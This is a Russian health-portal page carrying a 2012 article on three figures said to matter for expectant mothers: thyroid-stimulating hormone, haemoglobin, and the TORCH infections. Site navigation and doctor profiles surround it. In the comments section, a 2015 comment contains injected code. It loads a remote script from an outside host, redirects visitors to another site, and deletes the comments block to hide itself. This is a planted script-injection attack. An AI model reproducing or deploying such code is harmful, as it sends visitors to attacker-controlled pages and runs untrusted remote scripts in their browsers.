Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 цифры для будущей мамы  >>  3 цифры для будущей мамы
 
Обратная связь
 

3 цифры для будущей мамы

Размер шрифта
23 января 2012 09:00
  • google_analytics: false
  • Нравится

Главные показатели здоровья будущей мамы и ее ребенка укладываются всего в три цифры. Какие эти цифры и что они означают?

1

4,0
 
Этот показатель уровня тиреотропного гормона (ТТГ), который продуцируется гипофизом. Его повышенный уровень говорит о пониженной функции щитовидной железы и о нехватке йода. Для ребенка это может означать низкий уровень умственного развития. При низком уровне гормонов у плода развивается умственная отсталость и повышается шанс рождения «альпийского кретина».

Дефицит йода может привести к снижению уровня гормонов щитовидной железы еще до беременности. Поэтому, планируя беременность, очень важно проконсультироваться с эндокринологом. Дефицит гормонов лечат гормонами щитовидной железы в таблетках.

120

Это показатель нормального уровня гемоглобина в крови у мамы. Гемоглобин участвует в переносе кислорода к тканям, и важен как для здоровья мамы, так и для здоровья плода.

Отсутствие нормального уровня кислорода, или гипоксия, влияет на нормальное развитие всех органов и систем и чревата задержкой внутриутробного развития. При беременности женщина должна принимать добавки с железом, чтобы не развивалась истинная анемия. Эта болезнь развивается при низком содержании гемоглобина в крови: менее 110 г/л. В Москве, Санкт-Петербурге и многих других городах России ее выявляют у 40% будущих матерей. При этом женщина жалуется на одышку, слабость, обмороки. Иногда у беременных выпадают волосы, наблюдается ломкость ногтей, трещины в углах рта и желтизна ладоней.

Анемия – причина осложнений: токсикозы у беременных, страдающих анемией, появляются в 1,5 раза чаще, чем у здоровых женщин, а выкидыши, преждевременные роды — у 15-42%.

У детей, матери которых во время беременности страдали анемией, к году жизни тоже нередко бывает дефицит железа. Такие малыши чаще болеют ОРВИ, энтероколитом, пневмонией, аллергиями.

1

5

Эта цифра означает пять букв аббревиатуры TORCH, где каждая буква означает название инфекций, чрезвычайно опасных для беременных женщин. Вот расшифровка этой аббревиатуры:

Т – токсоплазмоз (toxoplasmosis)
О – другие инфекции (others). Сюда входят влияющие на плод инфекции: гепатит В и гепатит С, сифилис, хламидиоз, гонококковая инфекция, листериоз. Недавно в этот перечень включили ВИЧ-инфекцию, ветряную оспу, энтеровирусную инфекцию
R – краснуха (rubella)
С – цитомегаловирусная инфекция (cytomegalovirus)
H – герпес (herpes simplex virus)

Особенность этих инфекций в том, что при первичном заражении во время беременности они чрезвычайно опасны для плода: 

  • разрушают центральную нервную систему, повышая риск выкидыша, мертворождения и врожденных уродств ребенка.
  • формируют пороки развития, вплоть до инвалидности.

Что делать?

  • Сдать анализ крови на наличие антитител к TORCH-инфекциям еще до наступления беременности.
  • Обязательно сделать все необходимые прививки до наступления беременности.

Сюжеты оп теме:
Три важные цифры для будущих мам. Какие показатели определяют здоровье ребенка

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как определить тип недержания мочи?   Спросите маму, как вы родились   Каждые 8 минут родители почти убивают своих детей!   Как сделать тест на беременность?  
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 февраля 2013Ожирение можно предсказать сразу после рождения
 
21 января 2013Продвижение по карьерной лестнице зависит от даты рождения 07 декабря 2012Жизнь наследника британской короны под угрозой
 

Слайдшоу

1
Растяжки! Можно ли от них избавиться?
Что делать, если в жизни один геморрой?
Что мешает вам забеременеть

Тесты

1
Кофеин вызывает зависимость?
Что есть будущим мамам?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.